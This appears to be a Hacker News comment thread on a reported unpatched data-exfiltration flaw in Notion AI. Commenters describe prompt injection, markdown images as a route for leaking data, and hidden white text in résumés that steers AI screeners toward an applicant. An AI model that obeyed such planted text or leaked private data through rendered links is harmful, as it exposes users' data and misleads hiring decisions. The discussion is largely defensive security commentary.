Notion AI: Unpatched data exfiltration

(promptarmor.com)

201 points | by takira a day ago ago

34 comments

rdli a day ago ago
Securing LLMs is just structurally different. The attack space is "the entirety of the human written language" which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.
In general, treating LLM outputs (no matter where) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging) is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.
[-]
- kahnclusions 21 hours ago ago
  I’m not convinced LLMs can ever be secured, prompt injection isn’t going away since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
- vmg12 a day ago ago
  It's pretty simple, don't give llms access to anything that you can't afford to expose. You treat the llm as if it was the user.
  [-]
  - rdli a day ago ago
    I get that but just not entirely obvious how you do that for the Notion AI.
    [-]
    - embedding-shape 13 hours ago ago
      Don't use AI/LLMs that have unfettered access to everything?
      Feels like the question is "How do I prevent unauthenticated and anonymous users to use my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.
    - whateveracct 8 hours ago ago
      exactly?
- jcims 14 hours ago ago
  As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the anthropic paper on subliminal learning [1] was a bit eye opening in this regard) and subsequently have no deterministic way to protect it.
  1 - https://alignment.anthropic.com/2025/subliminal-learning/
  [-]
  - zbentley an hour ago ago
    I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.
    We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.
    Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.
- Barrin92 19 hours ago ago
  Dijkstra, On the Foolishness of "natural language programming":
  [...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]
  If only we had a way to tell a computer precisely what we want it to do...
  https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...
brimtown a day ago ago
This is @simonw’s Lethal Trifecta [1] again - access to private data and untrusted input are arguably the purpose of enterprise agents, so any external communication is unsafe. Markdown images are just the ones people usually forget about
[1] https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
[-]
- Miyamura80 14 hours ago ago
  Good point around the markdown image as an untrusted vector. Lethal trifecta is determnistically preventable, it really should be addressed wider in the indutry
falloutx a day ago ago
People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you, There are also resume collecting services which let you buy a set of resumes belonging to your general competition era and you can compare your ai results with them. Its an arms race to get called up for a job interview at the moment.
[-]
- AdieuToLogic 20 hours ago ago
  > People have learnt a little while back that you need to use the white hidden text in a resume to make the AI recommend you ...
  I would caution against using "white hidden text" within PDF resumes as all an ATS[0] need use in order to make hidden text the same as any other text is preprocess with the poppler[1] project's `pdftotext`. Sophisticated ATS[0] offerings could also use `pdftotext` in a fraud detection role with other document formats as well.
  0 - https://en.wikipedia.org/wiki/Applicant_tracking_system
  1 - https://poppler.freedesktop.org/
- Terr_ a day ago ago
  I wouldn't be surprised if people tried to document what LLMs different companies/vendors are using, in order to take advantage of model-biases.
  https://nyudatascience.medium.com/language-models-often-favo...
noleary 17 hours ago ago
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
[-]
- hxugufjfjf 15 hours ago ago
  As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.
digiown 10 hours ago ago
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer grade service without an explicit contract for any important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.
someguyiguess a day ago ago
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
[-]
- dtkav a day ago ago
  How was the migration process?
  I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.
  [-]
  - crashabr 14 hours ago ago
    I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but
    1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and
    2) Don't you expect to be sherlocked by the obsidian team?
    [-]
    - dtkav 8 hours ago ago
      In Obsidian you can have transclusions which is basically an embed of a section of another note. It isn't perfect, but worth looking into.
      Regarding getting sherlocked; Obsidian does have realtime collaboration on their roadmap. There are likely to be important differences in approach, though.
      Our offering is available now and we're learning a ton about what customers want.
      If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business and are around the state of the art of a philosophy of software.
      I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).
      That vision is inherently collaborative, anti lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).
    - embedding-shape 13 hours ago ago
      > 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and
      More or less yes, embeddable templates basically gives you that out of the box, Obsidian "Bases" let you query them.
      > 2) Don't you expect to be sherlocked by the obsidian team?
      I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.
      And after all, Obsidian is a for-profit company who can change their mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.
      [-]
      - dtkav 8 hours ago ago
        From their roadmap page:
        > Multiplayer > > Share notes and edit them collaboratively
        https://obsidian.md/roadmap
        [-]
        embedding-shape 7 hours ago ago
        Doesn't say real-time there though? But yeah, must be what they mean, because you can in theory already collaborate on notes, via their "Sync", although it sucks for real-time collaboration.
airstrike a day ago ago
IMHO the problem really comes from the browser accessing the URL without explicit user permission.
Bring back desktop software.
[-]
- embedding-shape 13 hours ago ago
  Meh, bring back thinking of security regardless of the platform instead. The web is gonna stay, might as well wish for people to treat the security on the platform better.
jonplackett a day ago ago
Sloppy coding to know a link could be a problem and render it anyway. But even worse to ignore the person who tells you you did that.
dcreater a day ago ago
One more reason not to use Notion.
I wonder when there will be awakening to not use SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the bay area.
I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.
[-]
- bossyTeacher 12 hours ago ago
  > I think the next wave is going to be native apps
  elaborate please?
jerryShaker a day ago ago
Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September
jrm4 a day ago ago
This, of course, more yelling into the void from decades ago, but companies who promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet effectively figured out how to do that yet. Not sure what it will take.
[-]
- pluralmonad 17 hours ago ago
  Its perfectly figured out, people just refuse to implement the solution. Stop giving your resources to the bad actors. The horrible behavior so many enable in order to not be inconvenienced is immense.
  [-]
  - jrm4 7 hours ago ago
    Perfectly? No. No. A million times no.
    You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.
    NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.
mirekrusin a day ago ago
Public disclosure date is Jan 2025, but should be Jan 2026.